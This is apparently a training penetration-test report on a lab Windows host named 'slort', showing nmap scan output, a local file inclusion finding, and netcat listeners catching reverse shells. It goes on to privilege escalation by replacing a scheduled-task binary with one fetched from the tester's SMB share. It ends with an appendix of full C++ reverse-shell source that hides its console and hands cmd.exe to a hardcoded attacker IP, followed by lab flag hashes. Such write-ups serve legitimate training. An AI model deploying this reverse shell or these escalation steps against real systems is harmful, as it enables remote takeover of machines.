The penetration test report contains all efforts that were conducted during client engagement. The purpose of this report is to ensure that the client has a full understanding of penetration testing methodologies as well as the technical knowledge to remediate any security flaws.
Objective
The objective of this assessment is to perform an internal penetration test against the network. The student is tasked with following methodical approach in obtaining full control of the network. This test should simulate an attacker and how an attacker would start from beginning to end.
Requirements
The pentester will be required to fill out this penetration testing report fully and to include the following sections:
Overall High-Level Summary and Recommendations (non-technical)
Methodology walkthrough and detailed outline of steps taken
Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
Any additional items that were not included
High-Level Summary
I was tasked with performing an internal penetration test towards the client network. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate internal systems. My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to the client.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on client's network. When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, I had administrative level access to multiple systems. All systems were successfully exploited and access granted. These systems as well as a brief description on how access was obtained are listed below:
192.168.192.53 (slort) - Local File Inclusion & Remote Code Execution
Recommendations
I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future. One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
Methodologies
I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the environments is secured. Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
Information Gathering
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, I was tasked with exploiting the client network. The specific IP addresses were:
Network
192.168.192.0/24
Penetration
The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, I was able to successfully gain access to all systems.
System IP: 192.168.192.53
Service Enumeration
The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.
┌──[Fri Nov 11 05:00:33 PM CST 2022]-[TheScriptKid]-[/tmp]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# rscan $ip
rustscan --accessible -u 5000 -b 2500 -a 192.168.192.53 -- -Pn -A
...
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
3306/tcp open mysql? syn-ack ttl 127
| mysql-info:
|_ MySQL Error: Host '192.168.49.192' is not allowed to connect to this MariaDB server
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, NULL, NotesRPC, SIPOptions, SSLSessionReq, afp:
|_ Host '192.168.49.192' is not allowed to connect to this MariaDB server
4443/tcp open http syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.192.53:4443/dashboard/
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
5040/tcp open unknown syn-ack ttl 127
7680/tcp open pando-pub? syn-ack ttl 127
8080/tcp open http syn-ack ttl 127 Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.192.53:8080/dashboard/
|_http-open-proxy: Proxy might be redirecting requests
|_http-favicon: Unknown favicon MD5: 6EB4A43CB64C97F76562AF703893C8FD
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=11/11%Time=636ED424%P=x86_64-pc-linux-gnu%r(N
SF:ULL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\x20is\x20not\x20a
SF:llowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSVersi
SF:onBindReqTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\x20is\x2
SF:0not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r
SF:(DNSStatusRequestTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\
SF:x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20se
SF:rver")%r(SSLSessionReq,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192
SF:'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20
SF:server")%r(SIPOptions,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'
SF:\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20s
SF:erver")%r(NotesRPC,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\x2
SF:0is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20serv
SF:er")%r(afp,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.49\.192'\x20is\x20n
SF:ot\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows 7 (91%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (90%), Microsoft Windows XP SP3 (88%), Microsoft Windows Server 2008 SP1 (88%), Microsoft Windows 10 (87%), Microsoft Windows 7 or Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 (87%), Microsoft Windows Server 2008 R2 or Windows 8.1 (87%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (87%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.92%E=4%D=11/11%OT=21%CT=%CU=31965%PV=Y%DS=2%DC=T%G=N%TM=636ED4D7%P=x86_64-pc-linux-gnu)
SEQ(SP=104%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=U)
OPS(O1=M551NW8NNS%O2=M551NW8NNS%O3=M551NW8%O4=M551NW8NNS%O5=M551NW8NNS%O6=M551NNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M551NW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 53006/tcp): CLEAN (Couldn't connect)
| Check 2 (port 4440/tcp): CLEAN (Couldn't connect)
| Check 3 (port 16946/udp): CLEAN (Failed to receive data)
| Check 4 (port 27555/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2022-11-11T23:03:39
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 60.54 ms 192.168.49.1
2 60.63 ms 192.168.192.53
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:03
Completed NSE at 17:03, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:03
Completed NSE at 17:03, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:03
Completed NSE at 17:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 180.39 seconds
Raw packets sent: 87 (5.736KB) | Rcvd: 42 (3.060KB)
Initial Shell - Local File Inclusion & Remote Code Execution
I Start to view the two web ports beginning with port 8080 and see a XAMPP system
Nothing of interest however I begin to search for directories and find a web directory called site
Going to the site directory redirects me to a page. Slort.
Viewing the URL's when viewing the source code shows Home, About, Services and so on appears to be utilizing a php parameter and including the pages.
With this information I begin to be on the lookout for a local file inclusion vulnerability and find that this is vulnerable to a Local File inclusion as I am able to view the access and error logs
┌──[Fri Nov 11 09:19:45 PM CST 2022]-[TheScriptKid]-[/home/pentester]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# nc -lnvp 443
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.192.53.
Ncat: Connection from 192.168.192.53:51073.
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\xampp\htdocs\site>
I begin to start searching files and system directories and came across the Backups directory in the top level of the C drive. Furthermore, inside the backups directory it appears there is a scheduled task running every 5 minutes.
PS C:\> ls
ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/11/2022 5:30 PM Backup
d----- 12/7/2019 1:14 AM PerfLogs
d-r--- 5/4/2022 1:06 AM Program Files
d-r--- 12/3/2021 8:22 AM Program Files (x86)
d-r--- 12/3/2021 8:29 AM Users
d----- 5/4/2022 1:52 AM Windows
d----- 6/12/2020 8:11 AM xampp
PS C:\> cd backup
cd backup
PS C:\backup> ls
ls
Directory: C:\backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/12/2020 7:45 AM 11304 backup.txt
-a---- 6/12/2020 7:45 AM 73 info.txt
-a---- 6/23/2020 7:49 PM 73802 TFTP.EXE
PS C:\backup> cat info.txt
cat info.txt
Run every 5 minutes:
C:\Backup\TFTP.EXE -i 192.168.234.57 get backup.txt
Looking into the permissions of the TFTP.EXE executable, this file can be modified by any user
PS C:\backup> icacls C:\Backup\TFTP.EXE
icacls C:\Backup\TFTP.EXE
C:\Backup\TFTP.EXE BUILTIN\Users:(I)(F)
BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
NT AUTHORITY\Authenticated Users:(I)(M)
I copy the file from my attacking machine smb server
PS C:\backup> net use \\192.168.49.192\winreconpack /user:smbuser smbuser
net use \\192.168.49.192\winreconpack /user:smbuser smbuser
The command completed successfully.
PS C:\backup> copy \\192.168.49.192\winreconpack\TFTP.EXE TFTP.EXE.mal
copy \\192.168.49.192\winreconpack\TFTP.EXE
Next I overwrite the TFTP.EXE with the malicious file and wait at most 5 minutes.
After a few minutes the task executes and I gain administrative access
┌──[Fri Nov 11 10:42:53 PM CST 2022]-[TheScriptKid]-[/root]
├──[wlan0: 192.168.1.153]-[tun0: 192.168.49.192]-[ip: 192.168.192.53]
└──# nc -lnvp 443 130 ⨯
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.192.53.
Ncat: Connection from 192.168.192.53:51486.
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
House Cleaning
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
After collecting data from the network was completed, I removed all user accounts and passwords as well as the Meterpreter services installed on the system. the client should not have to remove any user accounts or services from the system.
Additional Items
Appendix - Proof and Local Contents:
IP (Hostname)
Local.txt Contents
Proof.txt Contents
192.168.192.53
1bf81193978891c7b72fc8b9d4bd0a90
30a9b632f36e9aa08c07f1554e7b2b62
Appendix - Modified Prometheus Code
Modified Lines 82 & 83
//Author : Paranoid Ninja
//Email : paranoidninja@protonmail.com
//Blog : https://scriptdotsh.com/index.php/2018/09/04/malware-on-steroids-part-1-simple-cmd-reverse-shell/
//Compile with g++/i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
//The effective size with statically compiled code should be around 13 Kb
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024
void RunShell(char* C2Server, int C2Port) {
while(true) {
Sleep(5000); // 1000 = One Second
SOCKET mySocket;
sockaddr_in addr;
WSADATA version;
WSAStartup(MAKEWORD(2,2), &version);
mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = inet_addr(C2Server); //IP received from main function
addr.sin_port = htons(C2Port); //Port received from main function
//Connecting to Proxy/ProxyIP/C2Host
if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) {
closesocket(mySocket);
WSACleanup();
continue;
}
else {
char RecvData[DEFAULT_BUFLEN];
memset(RecvData, 0, sizeof(RecvData));
int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
if (RecvCode <= 0) {
closesocket(mySocket);
WSACleanup();
continue;
}
else {
char Process[] = "cmd.exe";
STARTUPINFO sinfo;
PROCESS_INFORMATION pinfo;
memset(&sinfo, 0, sizeof(sinfo));
sinfo.cb = sizeof(sinfo);
sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket;
CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo);
WaitForSingleObject(pinfo.hProcess, INFINITE);
CloseHandle(pinfo.hProcess);
CloseHandle(pinfo.hThread);
memset(RecvData, 0, sizeof(RecvData));
int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0);
if (RecvCode <= 0) {
closesocket(mySocket);
WSACleanup();
continue;
}
if (strcmp(RecvData, "exit\n") == 0) {
exit(0);
}
}
}
}
}
//-----------------------------------------------------------
//-----------------------------------------------------------
//-----------------------------------------------------------
int main(int argc, char **argv) {
FreeConsole();
if (argc == 3) {
int port = atoi(argv[2]); //Converting port in Char datatype to Integer format
RunShell(argv[1], port);
}
else {
char host[] = "192.168.49.192";
int port = 443;
RunShell(host, port);
}
return 0;
}
